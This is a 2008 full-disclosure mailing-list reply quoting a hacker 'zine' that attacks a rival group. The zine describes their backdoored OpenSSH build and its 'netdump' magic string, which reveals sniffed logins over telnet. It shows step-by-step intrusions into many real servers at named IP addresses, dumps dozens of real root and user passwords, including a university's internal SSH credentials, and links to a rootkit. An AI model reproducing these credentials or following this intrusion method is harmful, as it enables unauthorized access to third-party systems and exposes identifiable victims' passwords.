[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] x0x0x? its a joke!
From: Thedjatclubrock <tdjacr.wiki () gmail ! com>
Date: 2008-08-31 20:29:56
Message-ID: 48BAFF44.104 () gmail ! com
[Download RAW message or body]
Robert Holgstad wrote:
> you got owned by lamers, why do we care what you think or say?
>
> also you complain that all they can do is use modified sshd versions
> and that this makes them lame, but during your 'zine' this is all
> you are doing. does this also make you 'lamer'?
>
>
> On Sat, Aug 30, 2008 at 1:40 PM, bussinessinbox box
> <bussinessinbox@gmail.com <mailto:bussinessinbox@gmail.com>> wrote:
>
> SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt
>
>
>
> #!/labsec/v/for/vendetta:book1-x0x0x
>
######################################################################################################################
>
>
>
# \
#
> # .____ ___.
_________ #
>
>
> # | | _____ \_ |__ / _____/ ____
____ #
> # | | \__ \ | __ \ \_____ \_/ __ \_/
___\ #
>
>
> # | |___ / __ \| \_\ \/ \ ___/\
\___ #
> # |_______ (____ /___ /_______ /\___ >\___
> #
>
>
> # \/ \/ \/ \/ \/
\/ #
> # .___ .___ __
.__ #
>
>
> # | | ____ __| _/_ __ _______/
> ________|__| ____ ______ #
> # | |/ \ / __ | | \/ ___/\ __\_ __
\ |/ __ \ / ___/ #
>
>
> # | | | \/ /_/ | | /\___ \ | | | |
\/ \ ___/ \___ \ #
> # |___|___| /\____ |____//____ > |__| |__|
> __|\___ >____ > #
>
>
> # \/ \/
\/ \/ \/ #
>
# \
#
>
>
>
# \
#
> # -
presents: \
#
>
>
> # \- x0x0x exposed
-/
#
>
# \
#
>
>
>
######################################################################################################################
> # #
> # #
>
>
> # chapter one : random lame stuff #
> # chapter two : owned by yourself #
> # chapter three : download files/sniffs/stuff #
> # chapter four : conclusion #
>
>
> # - x0x0x - #
> # #
> # #
> # - [V]endetta. #
>
>
> # #
> #################################################################
>
>
> - <l> hello everyone !
> - <l> the reason of this zine(which by teh way we dont like) is:
vendetta >:)
>
>
> - <l> we've got ourselfs owned around sep~2007 by the most lamer
guys on brazil: r4t and his boyfriend skotch.(x0x0x)
> - <l> now it's vendetta time !
>
>
> #################################################################
>
>
> # #
> # #
> # _ _ #
> # __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ #
>
>
> # / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) #
> # \__|_||_\__,_| .__/\__\___|_| \___/_||_\___|
#
> # |_| #
>
>
> # #
> # #
> #################################################################
>
>
> first of all, lets introduce x0x0x, the most pseudo-hackers of
efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))
>
>
>
> [1];
http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
> [2]; http://lasercomb.de/x0x0x2.txt
>
>
>
> have you noticed how lame they are ?
>
> all they can & will ever do is change your openssh version to a
cracked one
> and pray that the users will log into some kool server
>
> and guess what, its NOT EVEN MADE by them ! - lets check it out -
>
>
>
> central@labsec [~xoxox/openssh-4.7p1] # more skynet.h
> /*
>
>
> ### # ### ## ### ## ### ###
###### ######
> ## # ## # ## ## ## #
## # # ## #
>
>
> #### ### #### ### #
#### ##
> ### #### ## #####
## ##
> # ## ## ## ## ## ## ##
## ##
>
>
> #### #### ## #### ### ##
###### ####
>
> - V E R S I O N 1. 0 -
> coded by fmrj
> 11.01.2008
>
>
>
>
> Features:
> - Logs SSH, SCP, SFTP, SSHD and ip / hostname
> - ftp logger included (netkit-ftp)
> - Encrypted sniffer logs
> - SSH, SCP, SFTP will not log you
> - compile script (see compile.sh)
>
>
> - rootlogin is permitted even though remoterootlogin is set to no
> - Will not log to syslog, utmp, wtmp or lastlog
> - If MAGIC_VERSION is NOT undeclared:
> telnet -hackedbox- 22 and type MAGIC_VERSION will show logs
without you having to log in.
>
>
> (WARNING: telnet does NOT encrypt like SSH, so this would be
visible with tcpdump)
> Also this will NOT get logged by syslog
>
>
> Future features:
> - pid hiding
> - More encryption / better sniffer encryption (thought of rc-crypt)
>
>
> - strace will show that ssh is logging, make it so that if ssh is
being ptrace'd it will not log
> - Have a cool PS1 for the bd
> - Write a ssh client that can:
> -> Connect and dump logs so you dont have to use telnet
approach (encrypted)
>
>
> -> That can do connect-chain (ssh -bounce box1 box2 box3)
>
>
> If you have this, it either means we are friends or someone gave
it to you, if so
> I would like this bd to be kept as private as possible, so please
dont pass it on
>
>
>
> I would also appreciate suggestions / ideas / help / whatever for
future features
> aim: fmrj09
>
>
> - Thanks *
>
> */
>
> - then there is some shit aion code which is public @ packetstorm -
>
> - their kool sshd backdoor kan be found in the end of thiz zine -
>
> - dont forget to check the gr8 shellscript skotch made -
>
> ################################## leTz hIghTlIghT 50m3th1n6
#############################
> telnet -hackedbox- 22 and type MAGIC_VERSION will show logs
without you having to log in.
>
>
> ################################## LETS HIGHLIGHT SOMETHING
#############################
>
> ohhhhhhwwwwwwww. k00l 3n0ugh !
> and gu355 wh47 ?
> th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !
>
>
>
> *thinks* is that a deja-vu or something ? i could swear that x0x0x
wrote something about it in our zine ! *thinks*
>
>
> central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
> #define MAGIC_VERSION "netdump"
>
>
>
>
> ----- th4nk5 8uddY ------
> ----- end of lame sshd backdor ----
>
> ***************** phalanx the gr8 kernel rootkit ***************
>
> 7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
> whAT ELsE Do thEY USE ?
>
>
>
> PHALANX ! THE gr8 prIv8 kERn3l r007k17
> get your own at
http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2
>
>
>
> * attached their k00l phalanx in the bottom of the zine *
>
> ***************** phalanx the gr8 kernel rootkit ***************
>
> ------ funny stuff:
>
> while looking at their boxes, we felt so disappointed that they
cant even write the right sshd version..
>
>
>
> [139.82.95.11:22 <http://139.82.95.11:22>] : SSH-2.0-p2-FC-4.3
> [212.200.96.150:22 <http://212.200.96.150:22>] :
SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
>
> [216.75.56.186:22 <http://216.75.56.186:22>] : SSH-2.0-OenSSH_4.2
>
> [140.122.141.164:2174 <http://140.122.141.164:2174>]: SSH-2.0-p1
Debian-5ubuntu0.5
> [143.107.250.214:22 <http://143.107.250.214:22>] : SSH-1.99-p1
> [201.62.131.185:22 <http://201.62.131.185:22>] : SSH-2.0-p1
Debian-8ubuntu1.2
>
>
> [200.144.189.17:22 <http://200.144.189.17:22>] : SSH-1.99-p1
>
> you must be asking yourself.. wtf? they cant even copy&paste the
right sshd version, how do they own so many servers?
>
> answer: bad system admins. doing a easy md5 checksum on ssh/sshd
binaries would do the trick. they dont even check their sshd banners.
>
>
>
> [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
> they suck. they beg for someone to code them some lame kernel
rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no
longer use them, k ?
>
>
> they blame us about using the same password, what about thei
magic_password ? kool, they use the 'netdump' on all their boxes,
> which is the reason for the chapter two.
> [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
>
>
>
> #################################################################
> # #
> # __ __ __ #
> # ____/ / ___ ____ / /____ ____ / /__ _____ #
>
>
> # / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ #
> # \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ #
> # /_/ #
> # #
>
>
> # #
> #################################################################
>
> ; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
> ; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
>
>
> ; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
> ;
> ; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE
usEd to BE
>
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 189.3.219.4
<http://189.3.219.4> 22
>
>
> Trying 189.3.219.4...
> Connected to 189.3.219.4 <http://189.3.219.4> (189.3.219.4
<http://189.3.219.4>).
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
>
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh
localhost dewd
>
>
> - cut-
>
> ******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3
5n1ff3r, 455h0l3 ********************
> central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4
<mailto:root@189.3.219.4>
>
>
> root@189.3.219.4 <mailto:root@189.3.219.4>'s password:
>
>
>
> Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222
<http://189.4.161.222>
>
>
>
> **** Connected to ****
>
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
>
>
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux servnet 2.6.18-4-486 i686 ****
>
> root@servnet:~#
>
>
> root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
> Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686
GNU/Linux
> inet addr:189.3.219.4 <http://189.3.219.4>
Bcast:189.3.219.63 <http://189.3.219.63> Mask:255.255.255.192
<http://255.255.255.192>
>
>
>
> root@servnet:~# last -1 root
> root pts/2 189.4.161.222 <http://189.4.161.222> Fri
Aug 8 16:27 - 16:32 (00:04)
> 222.161.4.189.in-addr.arpa domain name pointer
bd04a1de.virtua.com.br <http://bd04a1de.virtua.com.br>.
>
>
>
>
> ******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z
********************
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 91.199.207.141
<http://91.199.207.141> 22
> Trying 91.199.207.141...
> Connected to 91.199.207.141 <http://91.199.207.141>.
>
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
>
>
> pass_from: 91.199.207.142 <http://91.199.207.142> user:
root pass: salinarsalinar (x2.sprintdns.net
<http://x2.sprintdns.net>) -->>>>>>>>>> i hope you guys change the
passwd real quick :)
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
<mailto:root@91.199.207.141>
> root@91.199.207.141 <mailto:root@91.199.207.141>'s password:
>
>
> Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz
<http://97.139.broadband2.iol.cz>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux x1 2.6.18-6-686 i686 ****
>
>
>
> root@x1:~#
> root@x1:~# uname -a;w;last -1 root
> Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686
GNU/Linux
> 08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
>
> root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38
(00:20)
> root@x1:~# ifconfig -a|grep inet
> inet addr:91.199.207.141 <http://91.199.207.141>
Bcast:91.199.207.255 <http://91.199.207.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 195.91.248.58
<http://195.91.248.58> 22
>
>
> Trying 195.91.248.58...
> Connected to 195.91.248.58 <http://195.91.248.58>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.
>
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
<mailto:root@195.91.248.58>
> root@195.91.248.58 <mailto:root@195.91.248.58>'s password:
>
>
> Last login: Mon Aug 11 13:00:20 2008 from
ppp85-140-31-214.pppoe.mtu-net.ru <http://ppp85-140-31-214.pppoe.mtu-net.ru>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux localhost 2.6.24-gentoo-r3 i686 ****
>
>
>
> localhost ~ #
> localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
> Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local
time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU
E4500 @ 2.20GHz GenuineIntel GNU/Linux
>
>
> 10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
> root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07
(00:06)
>
> wtmp begins Mon Mar 31 21:49:08 2008
>
>
> inet addr:195.91.248.58 <http://195.91.248.58>
Bcast:195.91.248.63 <http://195.91.248.63> Mask:255.255.255.240
<http://255.255.255.240>
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
> central@labsec [~xoxox/h3h3] # telnet 195.71.126.86
<http://195.71.126.86> 22
> Trying 195.71.126.86...
> Connected to 195.71.126.86 <http://195.71.126.86>.
>
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.2
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
> pam_from: 91.128.212.13 <http://91.128.212.13> user:
root pass: w22662s (d91-128-212-13.cust.tele2.at
<http://d91-128-212-13.cust.tele2.at>) ---->>>> no localhost this
time(yay!) but it works.
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
<mailto:root@195.71.126.86>
> root@195.71.126.86 <mailto:root@195.71.126.86>'s password:
>
> root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
>
>
> Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686
GNU/Linux
> 08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
>
> root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc
> root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash
> root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc
> inet Adresse:195.71.126.86 <http://195.71.126.86>
Bcast:195.71.126.95 <http://195.71.126.95> Maske:255.255.255.240
<http://255.255.255.240>
>
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 152.66.208.100
<http://152.66.208.100> 22
>
>
> Trying 152.66.208.100...
> Connected to 152.66.208.100 <http://152.66.208.100>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: joeb pass:
xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
>
>
> pass_from: 78.131.80.171 <http://78.131.80.171> user:
joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu
<http://78-131-80-171.pool.hdsnet.hu>) > better be changing that
by now.
>
>
> SSH2_OUT: 78.131.80.171 <http://78.131.80.171> user:
joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu
<http://78-131-80-171.pool.hdsnet.hu>)> better be changing that by now.
>
>
> SSH2_OUT: 84.2.126.154 <http://84.2.126.154> user: joeb
pass: valami (dsl54027E9A.pool.t-online.hu
<http://dsl54027E9A.pool.t-online.hu>) > better be changing that
by now.
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
<mailto:root@152.66.208.100>
> root@152.66.208.100 <mailto:root@152.66.208.100>'s password:
>
> Last login: Wed Aug 13 08:29:00 2008 from
78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>
>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux maszat 2.6.18-6-686-bigmem i686 ****
>
>
>
> root@maszat:~#
> root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008
i686 GNU/Linux
> 08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05
>
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:152.66.208.100 <http://152.66.208.100>
Bcast:152.66.208.127 <http://152.66.208.127> Mask:255.255.255.128
<http://255.255.255.128>
>
>
> inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64
Scope:Global
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 147.46.242.9
<http://147.46.242.9> 22
> Trying 147.46.242.9...
> Connected to 147.46.242.9 <http://147.46.242.9>.
> Escape character is '^]'.
>
>
> SSH-2.0-OpenSSH_4.7
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
>
>
> pass_from: 147.46.242.52 <http://147.46.242.52> user:
dreameye pass: ii1945 (ropas.snu.ac.kr <http://ropas.snu.ac.kr>)
------>>>>>>>>>>>>>> sorry koreans, nothing personal.
>
>
> pass_from: 211.48.102.167 <http://211.48.102.167> user:
dk pass: 0ghafjs ------>>>>>>>>>>>>>> i
mean, personal with you, you no.
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
<mailto:root@147.46.242.9>
> root@147.46.242.9 <mailto:root@147.46.242.9>'s password:
>
> Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr
<http://ropas.snu.ac.kr>
>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux abs 2.6.24-19-server i686 ****
>
>
>
> root@abs:~#
> root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
> Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686
GNU/Linux
> 15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00
>
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:147.46.242.9 <http://147.46.242.9>
Bcast:147.46.242.255 <http://147.46.242.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
> inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
> inet6 addr: ::1/128 Scope:Host
>
> dreameye pts/0 ropas.snu.ac.kr <http://ropas.snu.ac.kr> Thu
Aug 7 03:35 - 03:36 (00:00)
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.160.119.92
<http://200.160.119.92> 8022 ----- same applies for 200.160.119.93
<http://200.160.119.93> (another dumbox on the network)
>
>
> Trying 200.160.119.92...
> Connected to 200.160.119.92 <http://200.160.119.92>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my
netdump user?
>
>
> pass_from: 192.168.100.231 <http://192.168.100.231> user:
root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello
m0nk3y
>
> central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92
<mailto:root@200.160.119.92> -p 8022
>
>
> root@200.160.119.92 <mailto:root@200.160.119.92>'s password:
>
> ******* no skynet thiz timE *********** h3h3h3h3 ***********
>
> Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
>
>
> root@eumisrvgw2:~#
> root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008
i686 GNU/Linux
> 03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00
>
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:192.168.100.242 <http://192.168.100.242>
Bcast:192.168.100.255 <http://192.168.100.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
> inet addr:192.168.200.254 <http://192.168.200.254>
Bcast:192.168.200.255 <http://192.168.200.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet addr:200.160.119.92 <http://200.160.119.92>
Bcast:200.160.119.95 <http://200.160.119.95> Mask:255.255.255.240
<http://255.255.255.240>
>
> inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
>
> inet addr:200.169.223.172 <http://200.169.223.172>
Bcast:200.169.223.175 <http://200.169.223.175> Mask:255.255.255.248
<http://255.255.255.248>
>
>
> root@eumisrvgw2:~# last -10 root|grep 189\.4
>
> root pts/0 189.4.161.222 <http://189.4.161.222> Mon
Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder
who that kool ip iz.
>
----------------------->>>>> bruteforce again? what a zhame !
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.20.9.67
<http://200.20.9.67> 22
>
>
> Trying 200.20.9.67...
> Connected to 200.20.9.67 <http://200.20.9.67>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
vEcTrrA (localhost)
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67
<mailto:root@200.20.9.67> -p 8022
> root@200.20.9.67 <mailto:root@200.20.9.67>'s password:
>
> root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
>
>
> Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686
GNU/Linux
> 04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00
> root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep
OUT ------------>> this is their default sniffer path.
>
>
> SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass:
LiNuX0527 (didi.if.uff.int <http://didi.if.uff.int>)
> SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass:
LiNuXS0527 (didi.if.uff.int <http://didi.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: nuno pass:
surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>)
> SSH2_OUT: 10.0.0.106 <http://10.0.0.106> user: lourenco pass:
LiNuX0527 (cerbero4.if.uff.int <http://cerbero4.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.108 <http://10.0.0.108> user: critter pass:
559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>)
> SSH2_OUT: 10.0.0.136 <http://10.0.0.136> user: davidvaz pass:
2o3145 (barabasi.if.uff.int <http://barabasi.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.145 <http://10.0.0.145> user: lubian pass:
15862jLr (lip-serverI.if.uff.int <http://lip-serverI.if.uff.int>)
> SSH2_OUT: 10.0.0.147 <http://10.0.0.147> user: mcosta pass:
950205 (nano3.if.uff.int <http://nano3.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: asa pass:
gabixande2 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>)
> SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: mcosta pass:
950205 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.156 <http://10.0.0.156> user: thiagofts
pass: 8vacagk (Owner-PC.if.uff.int <http://Owner-PC.if.uff.int>)
> SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: alanfr pass:
ck37=2x (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: curso pass:
curso (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
> SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: help pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: opeador pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
> SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: operador pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.179 <http://10.0.0.179> user: orahcio pass:
wulto12 (viagra.if.uff.int <http://viagra.if.uff.int>)
> SSH2_OUT: 10.0.0.188 <http://10.0.0.188> user: nuno pass:
surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.195 <http://10.0.0.195> user: asa pass:
gabixande2 (nano2.if.uff.int <http://nano2.if.uff.int>)
> SSH2_OUT: 10.0.0.196 <http://10.0.0.196> user: isidoro pass:
VU4R9C (zico.if.uff.int <http://zico.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.2 <http://10.0.0.2> user: isidoro pass: VU4R9C
> SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass:
2o3145 (homer.if.uff.int <http://homer.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass:
o3145 (homer.if.uff.int <http://homer.if.uff.int>)
> SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: tgmattos pass:
CAMtgm&7 (homer.if.uff.int <http://homer.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: asa pass:
gabixande2 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
> SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass:
LiNuX0527 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
>
>
